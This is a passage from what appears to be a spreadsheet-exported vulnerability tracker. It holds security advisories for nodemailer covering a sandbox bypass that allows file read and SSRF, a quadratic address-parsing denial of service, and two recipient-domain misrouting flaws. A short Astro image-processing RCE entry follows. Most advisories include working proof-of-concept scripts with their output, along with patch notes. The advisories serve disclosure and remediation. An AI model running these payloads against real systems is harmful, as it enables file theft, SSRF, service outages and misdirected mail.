A plugin or application code that resolves message content through the documented API (the same API the library's own `_convertDataImages` uses, threading the flags explicitly) thereby bypasses the sandbox an application deliberately enabled.

### Details

Root cause. The `MailMessage` constructor stores the transporter-level sandbox flags on the message object (`lib/mailer/mail-message.js:34-38`):

```js
['disableFileAccess', 'disableUrlAccess', 'normalizeHeaderKey', 'maxRecipients'].forEach(key =&gt; {
    if (key in options) {
        this.data[key] = options[key];
    }
});
```

The public resolver is a pure passthrough (`lib/mailer/mail-message.js:41-43`):

```js
resolveContent(...args) {
    return shared.resolveContent(...args);
}
```

`shared.resolveContent` supports the legacy 3-argument signature and collapses the missing options to `{}` (`lib/shared/index.js:524-530`):

```js
module.exports.resolveContent = (data, key, options, callback) =&gt; {
    // options is optional; support the legacy resolveContent(data, key, callback) signature
    if (!callback &amp;&amp; typeof options === 'function') {
        callback = options;
        options = false;
    }
    options = options || {};
    ...
    resolveContentValue(data, key, options, callback);
```

`resolveContentValue` then checks `options.disableUrlAccess` / `options.disableFileAccess` (`lib/shared/index.js:581` / `:590`), both `undefined` for the legacy signature, so it falls through to `nmfetch` (`:588`) or `fs.createReadStream` (`:597`).

Contrast with the fixed paths. `resolveAll()` (`lib/mailer/mail-message.js:112-115`) and `_convertDataImages()` (`lib/mailer/index.js:437-440`) both pass the message flags explicitly. The MIME streaming path (`lib/mime-node/index.js:1059-1077`) also honors the flags. So an application that enables the sandbox and then calls `transporter.sendMail()` is protected; the bypass appears only when message content is resolved through the public legacy-signature API — which is the documented plugin usage (the `resolveContent` JSDoc at `lib/shared/index.js:510-523` states it is "useful when you want to create a plugin that needs a content value").

Affected versions. Confirmed on `9.1.0` (HEAD `efd6e29c10c6e0c25c57bd2f2a71302838235a4f`, the current npm latest). The gap was introduced by the GHSA-wqvq-jvpq-h66f fix and is still present; the public API has no regression coverage (`test/mailer/mail-message-test.js` contains no `resolveContent` test).

### PoC

Requires: `nodemailer@9.1.0`, a readable local file, and any reachable HTTP endpoint (loopback suffices). Non-destructive; no network egress beyond a local listener.

```js
'use strict';
const nodemailer = require('nodemailer');
const MailMessage = require('nodemailer/lib/mailer/mail-message');

const TARGET_FILE = '/app/src/package.json';   // any readable local file
const SSRF_URL = 'http://http-sink:8080/poc-ssrf'; // any local/internal HTTP target

const transporter = nodemailer.createTransport({
    streamTransport: true,
    disableFileAccess: true,   // sandbox explicitly enabled
    disableUrlAccess: true
});

const data = {
    from: 'a@example.com', to: 'b@example.com', subject: 'poc', text: 'hello',
    html: { path: TARGET_FILE },
    attachments: [{ filename: 'x.bin', href: SSRF_URL }]
};
const mail = new MailMessage(transporter, data);
// mail.data.disableFileAccess === true, mail.data.disableUrlAccess === true

// Documented legacy plugin signature — options argument omitted:
mail.resolveContent(mail.data, 'html', (err, value) =&gt; {
    if (err) return console.log('BLOCKED', err.code);
    console.log('FILE_READ_OK len=', value.length);          // -&gt; 1647 (package.json)
});
mail.resolveContent(mail.data.attachments, 0, (err, body) =&gt; {
    if (err) return console.log('BLOCKED', err.code);
    console.log('URL_FETCH_OK body=', body.toString());      // -&gt; fetched response
});
```

Observed output on the audit environment (Node 22, `nodemailer@9.1.0`):

```text
mail.data.disableFileAccess = true | disableUrlAccess = true
[CONTROL resolveAll] err = EFILEACCESS : File access rejected for /app/src/package.json
[CONTROL html.path explicit-options] err = EFILEACCESS
[BYPASS html.path legacy] READ OK len = 1647 head = "{\n    \"name\": \"nodemailer\",\n    \"version\": \"9.1.0\",\n    \"des"
[BYPASS att[0].href legacy] FETCH OK len = 13 body = "HTTP-SINK OK\n"
```

The negative controls (`resolveAll`, and `resolveContent` with explicit `{ disableFileAccess: true }`) return `EFILEACCESS`, proving the sandbox works on the protected paths and only the legacy-signature passthrough is bypassed. The same bypass reproduces inside a real `transporter.sendMail()` flow when a `compile` plugin calls `mail.resolveContent(mail.data, 'html', cb)` / `mail.resolveContent(mail.data.attachments, 0, cb)`.

### Impact

An application that enables `disableFileAccess` / `disableUrlAccess` to contain untrusted message content and that resolves content through the documented plugin API (`mail.resolveContent(data, key, callback)`) has its sandbox silently bypassed:

- Arbitrary local file disclosure: a message `html`/attachment `path` pointing at a server file (`/etc/passwd`, `.env`, key material) is read and returned to the caller / delivered in the message.
- Server-side request forgery: a message `href` pointing at an internal or loopback URL is fetched from the application host.

Reachability precondition: the sandbox flags must be enabled (default off) and the application or its plugin must invoke the documented legacy-signature API on attacker-influenced data. The default `transporter.sendMail()` path remains protected, so this is a defense-in-depth gap in the library's own access-control enforcement rather than a default-flow bypass. It is the same vulnerability class as the previously accepted GHSA-wqvq-jvpq-h66f (CVE-2026-82660) and GHSA-p6gq-j5cr-w38f (CVE-2026-82659), on a distinct third code path.</t></is></c><c r="T83" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-92595</t></is></c></row><row r="84"><c r="A84" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B84" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C84" s="5" t="inlineStr"><is><t>CVE-2026-92596</t></is></c><c r="D84" s="5" t="inlineStr" /><c r="E84" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F84" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G84" s="5" t="inlineStr" /><c r="H84" s="5" t="inlineStr" /><c r="I84" s="5" t="inlineStr" /><c r="J84" s="5" t="inlineStr" /><c r="K84" s="5" t="inlineStr" /><c r="L84" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M84" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N84" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O84" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P84" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q84" s="5" t="inlineStr" /><c r="R84" s="5" t="inlineStr" /><c r="S84" s="5" t="inlineStr"><is><t>### Summary

Nodemailer's address parser (`lib/addressparser/index.js`) parses a list of comma‑separated addresses in **quadratic time — O(n²)** in the number of addresses. A single crafted address string (e.g. a `To`, `Cc`, `Bcc`, `From`, or `Reply‑To` value, or any value passed to the exported `addressparser`) therefore consumes CPU proportional to the **square** of its length and blocks Node's single‑threaded event loop for the entire duration, denying service to every other request in the process.

This requires **no special application configuration and no cooperating receiver** — it is entirely inside the parser and triggers on the library's default code path. A ~1.5 MB address value freezes the process for ~25–30 seconds of 100% CPU; the cost grows with the square of the input, so a few‑MB value stalls the server for minutes. It is a distinct issue from the recursion DoS fixed as CVE‑2025‑14874 (that path is guarded by a nesting‑depth cap; this one is a flat, comma‑separated list with no such limit).

### Details

`addressparser` tokenizes the input, splits it into per‑address token groups, and then accumulates the parsed results in a loop (`lib/addressparser/index.js`, ~lines 500–505):

```js
addresses.forEach(addr =&gt; {
    const handled = _handleAddress(addr, depth);
    if (handled.length) {
        parsedAddresses = parsedAddresses.concat(handled);   // &lt;-- line ~503
    }
});
```

`Array.prototype.concat` builds and returns a **new** array containing a copy of every element accumulated so far. Reassigning `parsedAddresses = parsedAddresses.concat(handled)` on each of the *n* iterations copies 1 + 2 + 3 + … + n elements in total, i.e. **O(n²)** work (and O(n²) transient allocations) for an input containing *n* addresses. Tokenization and `_handleAddress` themselves are linear; the quadratic blowup is entirely this accumulator.

**Root‑cause proof.** Replacing only that line with an in‑place append and re‑running the exact same input:

```
parsedAddresses = parsedAddresses.concat(handled);      -&gt;  100000 addresses:  ~6068 ms
parsedAddresses.push.apply(parsedAddresses, handled);   -&gt;  100000 addresses:  ~51 ms   (≈119x faster, now linear)
```

**Measured scaling** (nodemailer 9.0.6, `'a@b.com,'.repeat(n)`):

| addresses n | input size | parse time | ratio for 2× input |
|---|---|---|---|
| 25,000  | 0.19 MB | ~0.35 s | – |
| 50,000  | 0.38 MB | ~1.4 s  | ×4.0 |
| 100,000 | 0.76 MB | ~6–8 s  | ×3.9 |
| 200,000 | 1.53 MB | ~25–30 s| ×4.1 |

Doubling the input quadruples the time — the signature of O(n²).

**Reachability.** The parser is invoked on any structured‑address header value on the normal send path (`MimeNode.setHeader('To'/'Cc'/'Bcc'/'From'/'Reply-To', value)` → `_parseAddresses` → `addressparser`, and `getEnvelope()`), so a single `transport.sendMail({ to: &lt;crafted string&gt; })` triggers it. It is also reached directly through the **exported** `require('nodemailer/lib/addressparser')`, which many applications call to validate or display user‑supplied recipient lists. Confirmed via the public API: `setHeader('To', 'a@b.com,'.repeat(80000))` + `getEnvelope()` blocks for ~3.9 s.

**Suggested fix:** accumulate in place instead of rebuilding the array each iteration, e.g. `parsedAddresses.push.apply(parsedAddresses, handled);` (or `for (const h of handled) parsedAddresses.push(h);`). Optionally cap the number of addresses / input length before parsing.

### PoC

Environment: Node.js ≥ 18 and the published `nodemailer@9.0.6`. No transport, network, or configuration required — the cost is in parsing.

`poc-dos.js`:
```js
'use strict';
const addressparser = require('nodemailer/lib/addressparser');

console.log('addresses | input size | parse time');
for (const n of [25000, 50000, 100000, 200000]) {
  const payload = 'a@b.com,'.repeat(n);        // n valid, comma-separated recipients
  const t0 = process.hrtime.bigint();
  addressparser(payload);                       // blocks synchronously
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  console.log(String(n).padStart(9) + ' | ' + (payload.length / 1048576).toFixed(2) + ' MB   | ' + ms.toFixed(0).padStart(7) + ' ms');
}
```

Run:
```
npm init -y &amp;&amp; npm install nodemailer@9.0.6
node poc-dos.js
```

Actual output (nodemailer 9.0.6):
```
addresses | input size | parse time
    25000 | 0.19 MB   |     381 ms
    50000 | 0.38 MB   |    1435 ms
   100000 | 0.76 MB   |    7949 ms
   200000 | 1.53 MB   |   25154 ms
```

Equivalent trigger through the normal send API (freezes the event loop):
```js
const nodemailer = require('nodemailer');
nodemailer.createTransport({ jsonTransport: true })
  .sendMail({ from: 'a@b.com', to: 'a@b.com,'.repeat(150000), subject: 'x', text: 'y' });
// ~15+ seconds of 100% CPU inside addressparser before anything is sent
```

### Impact

* **Who is impacted:** any service that runs Nodemailer (or the standalone `nodemailer/lib/addressparser`) on an address value that can be influenced by an untrusted party — a recipient field in a "send email / invite / share" feature, a `Reply‑To`/`From` derived from user input, a contact‑import or mailing‑list parser, or any endpoint that validates addresses with `addressparser`. No authentication, special option, or particular receiver is needed.

## Patched in 9.1.0

Three separate quadratic paths were fixed, not one:

* `addressparser` rebuilt its accumulator with `concat()` on every address ([9116da9](https://github.com/nodemailer/nodemailer/commit/9116da9)).
* The display-name merge loop directly below spliced each fragment out of the array, the same shape reached through `'a, b &lt;c@d.com&gt;,'.repeat(n)` (same commit).
* `MimeNode#_convertAddresses` checked recipient uniqueness with a linear scan per address ([7cc38af](https://github.com/nodemailer/nodemailer/commit/7cc38af), refined in [34da642](https://github.com/nodemailer/nodemailer/commit/34da642)). This was the most severe of the three and the reported proof of concept did not reach it: `'a@b.com,'.repeat(n)` is one address repeated, which dedupes to a single envelope entry. A list of *distinct* recipients cost O(n^2) here, taking ~35s for 100k even after `addressparser` was fixed.

Fixed alongside: `[].concat.apply` in `_parseAddresses` threw `RangeError: Maximum call stack size exceeded` past roughly 124k recipients, with no crafted input needed ([83b8c48](https://github.com/nodemailer/nodemailer/commit/83b8c48)).

Parsing 200k addresses now takes ~80ms instead of ~25s, and every path scales linearly. A new `maxRecipients` option (default 100000) throws rather than truncating, as a backstop.</t></is></c><c r="T84" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-92596</t></is></c></row><row r="85"><c r="A85" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B85" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C85" s="5" t="inlineStr"><is><t>CVE-2026-92597</t></is></c><c r="D85" s="5" t="inlineStr" /><c r="E85" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F85" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G85" s="5" t="inlineStr" /><c r="H85" s="5" t="inlineStr" /><c r="I85" s="5" t="inlineStr" /><c r="J85" s="5" t="inlineStr" /><c r="K85" s="5" t="inlineStr" /><c r="L85" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M85" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N85" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O85" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P85" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q85" s="5" t="inlineStr" /><c r="R85" s="5" t="inlineStr" /><c r="S85" s="5" t="inlineStr"><is><t>### Summary

Nodemailer's email-address parser treats an **RFC 5322 comment** `( ... )` inside the domain as a point to **concatenate** the surrounding text, rather than as folding whitespace (CFWS) that **terminates** the domain. Consequently a recipient address such as `user@good-corp.com(x)evil.com` is parsed and **delivered to `good-corp.comevil.com`** (registrable domain `comevil.com`, attacker‑controlled), while a conformant RFC 5322 parser terminates the domain at the comment and reads `good-corp.com`.

An application that decides *whether it is allowed to email a recipient* by parsing/validating the recipient's domain — with a strict RFC 5322 parser (used without inspecting parse defects) or with a naive prefix/substring allow‑list — and then hands the raw address to Nodemailer for delivery, can be induced to send mail to a domain the attacker controls. This is an **Interpretation Conflict (CWE‑436)**, the same class as CVE‑2025‑13033, reached through the RFC 5322 *comment* construct (the "Comments" technique in PortSwigger's *Splitting the email atom* research, which produced a Postfix fix).

Severity is **Moderate**: exploitation requires the app's domain check to disagree with Nodemailer (see **Impact** for exactly which parsers do and do not). Verified end‑to‑end against a real RFC 5321 SMTP server (nodemailer 9.0.6 → `aiosmtpd`).

### Details

Root cause is in `lib/addressparser/index.js`.

1. The tokenizer registers the comment as an operator pair (`Tokenizer.operators`):
   ```js
   '(': ')',            // line ~331
   ```
2. When the **closing** `)` is immediately followed by a non‑break character (anything other than space / tab / CR / LF / `,` / `;`), the tokenizer marks that operator token with `noBreak = true`:
   ```js
   // Tokenizer.checkChar, lines ~398-399
   if (nextChr &amp;&amp; ![' ', '\t', '\r', '\n', ',', ';'].includes(nextChr)) {
       this.node.noBreak = true;
   }
   ```
3. `_handleAddress` then **glues** the token that follows the comment onto the token that preceded it (dropping the comment):
   ```js
   // _handleAddress, lines ~187-188
   if (prevToken &amp;&amp; prevToken.noBreak &amp;&amp; data[state].length) {
       data[state][data[state].length - 1] += token.value;   // &lt;-- concatenation
   }
   ```

For the input `user@good-corp.com(x)evil.com` the tokens are `text:"user@good-corp.com"`, `op:"("`, `text:"x"`, `op:")"` (flagged `noBreak`), `text:"evil.com"`. Step 3 appends `evil.com` onto `user@good-corp.com`, producing the single domain **`good-corp.comevil.com`**. The comment content (`x`) is discarded into the display‑name field.

RFC 5322 defines a comment as CFWS — semantically folding whitespace — and it may **not** appear inside a `dot-atom`. A comment therefore *separates* tokens and terminates the domain; the conformant reading of `good-corp.com(x)evil.com` is the domain `good-corp.com` (with the trailing `evil.com` being invalid/ignored). Nodemailer instead concatenates the two atoms across the removed comment, yielding a different, attacker‑registrable domain.

Nodemailer uses the parsed address for **both** the SMTP envelope (`getEnvelope()` → `RCPT TO`) and the emitted `To:`/`From:` headers, so the entire message is routed to the concatenated domain.

**Related grammar defect (bonus, lower impact):** nested comments are legal in RFC 5322, but the tokenizer closes the comment at the *first* `)` (`chr === this.operatorExpecting`, line ~392), so a valid nested comment such as `user@x.com(a(b)c)` is mis‑balanced and mangled to `x.comc)`. That particular output contains a stray `)` and is **rejected** by a conformant MTA (501) — a bounce/robustness issue, not a misroute.

**Suggested fix:** treat a comment as folding whitespace that terminates the current token — i.e. do **not** propagate `noBreak` across a comment‑closing `)` (restrict the `noBreak` optimization to quoted‑string closes), and support nested comments per RFC 5322. Equivalently, never emit a domain formed by concatenating two atoms that were separated only by a comment.

### PoC

Environment: Node.js ≥ 18 and the published `nodemailer@9.0.6`. No special transport configuration is required; the discrepancy is in address parsing.

`poc-comment.js`:
```js
'use strict';
const net = require('net');
const nodemailer = require('nodemailer'); // 9.0.6

const TRUSTED   = 'good-corp.com';
const RECIPIENT = 'user@good-corp.com(x)evil.com'; // RFC 5322 comment (x) between two domains

// tiny SMTP sink that prints the literal RCPT TO nodemailer transmits
const server = net.createServer(sock =&gt; {
  let buf = ''; sock.write('220 sink\r\n');
  sock.on('data', d =&gt; { buf += d; let i;
    while ((i = buf.indexOf('\r\n')) &gt;= 0) { const line = buf.slice(0, i); buf = buf.slice(i + 2);
      const u = line.toUpperCase();
      if (u.startsWith('EHLO')) sock.write('250-sink\r\n250 8BITMIME\r\n');
      else if (u.startsWith('RCPT')) { console.log('nodemailer transmits :', line); sock.write('250 ok\r\n'); }
      else if (u.startsWith('DATA')) sock.write('354 go\r\n');
      else if (line === '.') sock.write('250 ok\r\n');
      else if (u.startsWith('QUIT')) { sock.write('221 bye\r\n'); sock.end(); }
      else sock.write('250 ok\r\n'); } });
});
server.listen(0, '127.0.0.1', async () =&gt; {
  const t = nodemailer.createTransport({ host: '127.0.0.1', port: server.address().port, secure: false });
  await t.sendMail({ from: 'app@good-corp.com', to: RECIPIENT, subject: 'hi', text: 'x' });
  t.close(); server.close();
});
```

Run:
```
npm init -y &amp;&amp; npm install nodemailer@9.0.6
node poc-comment.js
```

Actual output (nodemailer 9.0.6):
```
nodemailer transmits : RCPT TO:&lt;user@good-corp.comevil.com&gt;
```

The application asked to mail `user@good-corp.com(x)evil.com`; Nodemailer delivers to `good-corp.comevil.com` — registrable domain `comevil.com`, which an attacker can register.

**Verified against a real RFC 5321 server** (containerized lab included with this report — `docker compose up --build`, case `R8_comment_glue`, receiver = `aiosmtpd`):
```
wire RCPT TO                     : RCPT TO:&lt;user@good-corp.comevil.com&gt;
real server                      : ACCEPTED (250)
recipient parsed by real server  : user@good-corp.comevil.com   (domain good-corp.comevil.com)
delivered To header              : x &lt;user@good-corp.comevil.com&gt;
```

**Which parser sees what** (the crux of exploitability):

| Parser used by the application to gate/route | Domain it reads from `user@good-corp.com(x)evil.com` | Deceived? |
|---|---|---|
| Python `email.policy.default` (strict RFC 5322) | `good-corp.com` *(flags `InvalidHeaderDefect`)* | Yes, if defects are not checked |
| Naive prefix / substring allow‑list (`startsWith`/`includes('@good-corp.com')`) | `good-corp.com` | Yes |
| Nodemailer's own `addressparser` | `good-corp.comevil.com` | No |
| Python `email.utils.getaddresses` | `good-corp.comevil.com` | No |
| WHATWG `url.domainToASCII` | `good-corp.com(x)evil.com` | No |

### Impact



* **Who is impacted:** applications that make a security or routing decision on the recipient **domain** using a parser that terminates the domain at the comment, while relying on Nodemailer for delivery — specifically those that validate with a strict RFC 5322 parser **without inspecting parse defects**, or with a **prefix/substring/allow‑list** check (e.g. "only send to `@good-corp.com`", employee‑only flows, "same‑tenant" routing). Applications that validate with Nodemailer's own `addressparser`, `email.utils.getaddresses`, or `url.domainToASCII` are **not** affected, which is why this is rated below the IDN/Punycode issue.

## Patched in 9.1.0

Fixed in [902b63e](https://github.com/nodemailer/nodemailer/commit/902b63e).

Not propagating `noBreak` across the closing `)` on its own breaks valid addresses, because CFWS is legal on either side of the `@`: `user@(x)good-corp.com` and `user(x)@good-corp.com` both come out mangled. A comment now joins what it separates only when one side carries the `@`, so those keep resolving while `user@good-corp.com(x)evil.com` terminates at `good-corp.com`.

Quoted-string and angle-address joining are unchanged. Nested comments are still not modelled, but the misroute is gone: `user@x.com(a(b)c)` now yields `user@x.com`.</t></is></c><c r="T85" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-92597</t></is></c></row><row r="86"><c r="A86" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B86" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C86" s="5" t="inlineStr"><is><t>CVE-2026-92598</t></is></c><c r="D86" s="5" t="inlineStr" /><c r="E86" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F86" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G86" s="5" t="inlineStr" /><c r="H86" s="5" t="inlineStr" /><c r="I86" s="5" t="inlineStr" /><c r="J86" s="5" t="inlineStr" /><c r="K86" s="5" t="inlineStr" /><c r="L86" s="5" t="inlineStr"><is><t>npm:nodemailer</t></is></c><c r="M86" s="5" t="inlineStr"><is><t>9.1.0</t></is></c><c r="N86" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O86" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P86" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q86" s="5" t="inlineStr" /><c r="R86" s="5" t="inlineStr" /><c r="S86" s="5" t="inlineStr"><is><t>### Summary

Nodemailer resolves an international (IDN / non-ASCII) recipient **domain** to a different Punycode `xn--` label than every UTS‑46‑conformant parser (web browsers, the WHATWG URL Standard, Node's `url.domainToASCII`, Python's `idna`). Its address normalizer (`_normalizeAddress` in `lib/mime-node/index.js`) uses the bundled **raw RFC‑3492 Punycode codec with no UTS‑46 mapping/normalization**, so a domain that a standards‑compliant validator maps to a trusted domain is delivered by Nodemailer to a **different, attacker‑registrable domain**.

An application that applies a domain allow‑list / same‑domain check to a recipient using a normal IDN‑aware parser (or that shows the normalized recipient to a user for confirmation) and then relies on Nodemailer to deliver to that domain can be induced to send email to an **unintended external domain**. This is the same weakness class as CVE‑2025‑13033 (Interpretation Conflict, CWE‑436) but reached through IDN/Punycode rather than quoted local‑parts, and it is not addressed by the 7.0.7 fix.

Because the mismatch can be triggered with an **invisible** character (U+00AD SOFT HYPHEN) that UTS‑46 folds away to the *exact* trusted domain string, no visible look‑alike/homograph is required.

### Details

`lib/mime-node/index.js` → `_normalizeAddress(address)` (around lines 1307–1346) splits the address at the last `@` and normalizes the domain like this:

```js
// lib/mime-node/index.js
try {
    if (/[\x80-￿]/.test(user)) {
        encodedDomain = punycode.toUnicode(domain.toLowerCase());   // line ~1338
    } else {
        encodedDomain = punycode.toASCII(domain.toLowerCase());     // line ~1340
    }
} catch (_err) {
    // keep domain as supplied
}
return `${this._normalizeLocalPart(user)}@${encodedDomain}`;         // line ~1346
```

`punycode` here is the project’s bundled codec (`lib/punycode/`), which is a **pure RFC 3492 (Punycode) implementation**. The only normalization applied to the domain is `.toLowerCase()`. It performs **none of the UTS‑46 “IDNA2008 + compatibility processing” steps** that browsers and DNS‑facing resolvers apply before Punycode encoding, specifically:

* removing **Ignored** code points such as `U+00AD` SOFT HYPHEN,
* **Mapping** full‑width / compatibility characters to their canonical ASCII forms,
* Unicode **NFC** normalization,
* validity checks.

As a result, for any domain containing a UTS‑46‑mapped or ‑ignored character, Nodemailer’s `punycode.toASCII(...)` produces a **different A‑label** than `url.domainToASCII(...)` (Node ≥ 7 / WHATWG), `new URL('http://'+domain)`, browsers, and Python’s `idna` (`uts46=True`). Nodemailer then uses its A‑label as:

* the SMTP envelope recipient written to the wire as `RCPT TO:&lt;local@xn--…&gt;` (`getEnvelope()` → `lib/smtp-connection/index.js` `_setEnvelope`), **and**
* the address emitted in the `To:` / `From:` headers (`_convertAddresses`).

So the domain a standards‑compliant validator computes and the domain Nodemailer actually delivers to **disagree**, on a syntactically valid, validator‑accepted address. Concrete divergences (verified on 9.0.6):

| recipient (raw) | UTS‑46 parser (`url.domainToASCII`) | Nodemailer delivers to |
|---|---|---|
| `victim@compa{U+00AD}ny.com` (invisible soft hyphen) | `company.com` | `xn--company-pka.com` |
| `victim@ｃｏｍｐａｎｙ.com` (full‑width) | `company.com` | `xn--mi7cd4afch9d.com` |
| `user@exámple.com` (NFD `a`+U+0301) | `xn--exmple-qta.com` | `xn--example-vge.com` |

This is the “Punycode / IDN parser discrepancy” technique documented in PortSwigger’s *Splitting the email atom* research (which produced e.g. Joomla CVE‑2024‑21725 and fixes in the PHP `idna_convert` library). The fix for CVE‑2025‑13033 (nodemailer 7.0.7) hardened the *quoted‑local‑part* path only; this IDN path is independent and still present in **9.0.6 (latest)** and, given the long‑standing use of the bundled RFC‑3492 codec, earlier releases.

**Suggested remediation:** perform UTS‑46 processing before/at domain encoding so Nodemailer’s resolution matches browsers, validators, and DNS — e.g. use the runtime’s `url.domainToASCII()` (available since Node 7) instead of the raw `punycode.toASCII`, and decode with the matching UTS‑46 `domainToUnicode`. At minimum, reject a domain whose value changes under UTS‑46 mapping (i.e. `punycode.toASCII(d)` ≠ `url.domainToASCII(d)`).

### PoC

Environment: Node.js ≥ 18, the published `nodemailer@9.0.6`. No special configuration; the discrepancy is in domain normalization itself.

`poc-idn.js`:

```js
'use strict';
const net = require('net');
const url = require('url');
const nodemailer = require('nodemailer'); // 9.0.6

const TRUSTED   = 'company.com';                        // the only domain the app will mail
const RECIPIENT = 'victim@compa\u00ADny.com';           // attacker input: invisible U+00AD inside "company"

// The app's domain allow-list check, done the standard (UTS-46 / browser / WHATWG) way:
const seen = url.domainToASCII(RECIPIENT.split('@').pop());
console.log('validator (url.domainToASCII) sees:', JSON.stringify(seen),
            seen === TRUSTED ? '=&gt; ALLOWED (equals trusted domain)' : '');

// A tiny SMTP sink that prints the literal RCPT TO Nodemailer transmits:
const server = net.createServer(sock =&gt; {
  let buf = ''; sock.write('220 sink\r\n');
  sock.on('data', d =&gt; { buf += d; let i;
    while ((i = buf.indexOf('\r\n')) &gt;= 0) { const line = buf.slice(0, i); buf = buf.slice(i + 2);
      const u = line.toUpperCase();
      if (u.startsWith('EHLO')) sock.write('250-sink\r\n250 8BITMIME\r\n');
      else if (u.startsWith('RCPT')) { console.log('nodemailer transmits             :', line); sock.write('250 ok\r\n'); }
      else if (u.startsWith('DATA')) sock.write('354 go\r\n');
      else if (line === '.') sock.write('250 ok\r\n');
      else if (u.startsWith('QUIT')) { sock.write('221 bye\r\n'); sock.end(); }
      else sock.write('250 ok\r\n'); } });
});
server.listen(0, '127.0.0.1', async () =&gt; {
  const t = nodemailer.createTransport({ host: '127.0.0.1', port: server.address().port, secure: false });
  await t.sendMail({ from: 'app@company.com', to: RECIPIENT, subject: 'reset your password', text: 'secret link' });
  t.close(); server.close();
});
```

Run:

```
npm init -y &amp;&amp; npm install nodemailer@9.0.6
node poc-idn.js
```

Actual output (Nodemailer 9.0.6):

```
validator (url.domainToASCII) sees: "company.com" =&gt; ALLOWED (equals trusted domain)
nodemailer transmits             : RCPT TO:&lt;victim@xn--company-pka.com&gt;
```

The application’s domain check approves `company.com`, but the message is sent to `xn--company-pka.com` — a **different domain an attacker can register** — carrying the `To:` header `&lt;victim@xn--company-pka.com&gt;` as well.

A containerized version that proves the same result against a **real RFC 5321 SMTP server** (`aiosmtpd`) is included alongside this report (`docker compose up --build`, cases `R6`/IDN); the receiving server accepts `RCPT TO:&lt;victim@xn--company-pka.com&gt;` and reports the recipient domain as `xn--company-pka.com`.

### Impact

Any application that uses Nodemailer to send mail to a recipient whose domain is subjected to a security or trust decision made with a *different* (UTS‑46‑conformant) parser, and then trusts Nodemailer to deliver to that domain. This includes:
  * recipient **allow‑list / block‑list / “same corporate domain” checks** implemented with `new URL()`, `url.domainToASCII`, a browser‑side check, or an IDN library;
  * flows that **display or log the normalized recipient domain** for human confirmation (the shown `company.com` differs from the delivered `xn--company-pka.com`);
  * any domain‑gated feature (employee‑only registration, “send only to our tenant”, notification routing).

## Patched in 9.1.0

Domain encoding now applies UTS-46 ([259c32d](https://github.com/nodemailer/nodemailer/commit/259c32d)), so `victim@compa­ny.com` resolves to `company.com`, matching `url.domainToASCII` and browsers.

One caveat on the suggested remediation, hardened in [b212ac4](https://github.com/nodemailer/nodemailer/commit/b212ac4): `url.domainToASCII` is a WHATWG **host parser**, not a pure UTS-46 mapper. It terminates the host at `/`, `\\`, `?` and `#` and percent-decodes. Used unguarded it introduces a worse version of the same weakness, since `user@attacker.example/mail.corp.example` encodes to the deliverable `user@attacker.example` where the bundled Punycode codec left it intact and unroutable. Those characters are now kept away from the mapper.

On severity, "attacker-registrable" is doing significant work in the report: `xn--company-pka.com` decodes to a label containing U+00AD and `xn--mi7cd4afch9d.com` to full-width Latin, neither of which Verisign's IDN tables permit for a .com registration. The misdelivery and the confirmation-UI mismatch stand regardless, which is why this is rated level with the comment issue rather than above it.</t></is></c><c r="T86" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-92598</t></is></c></row><row r="87"><c r="A87" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B87" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C87" s="5" t="inlineStr"><is><t>GHSA-26w7-cxv4-gfx2</t></is></c><c r="D87" s="5" t="inlineStr" /><c r="E87" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F87" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G87" s="5" t="inlineStr" /><c r="H87" s="5" t="inlineStr" /><c r="I87" s="5" t="inlineStr" /><c r="J87" s="5" t="inlineStr" /><c r="K87" s="5" t="inlineStr" /><c r="L87" s="5" t="inlineStr"><is><t>npm:astro</t></is></c><c r="M87" s="5" t="inlineStr"><is><t>7.2.8</t></is></c><c r="N87" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O87" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P87" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q87" s="5" t="inlineStr" /><c r="R87" s="5" t="inlineStr" /><c r="S87" s="5" t="inlineStr"><is><t>A vulnerability in `libheif`, used by the default Sharp image service in Astro, can lead to remote code execution when a malicious AVIF image is optimized.

Projects are affected when an attacker can cause Astro to process an untrusted AVIF image.

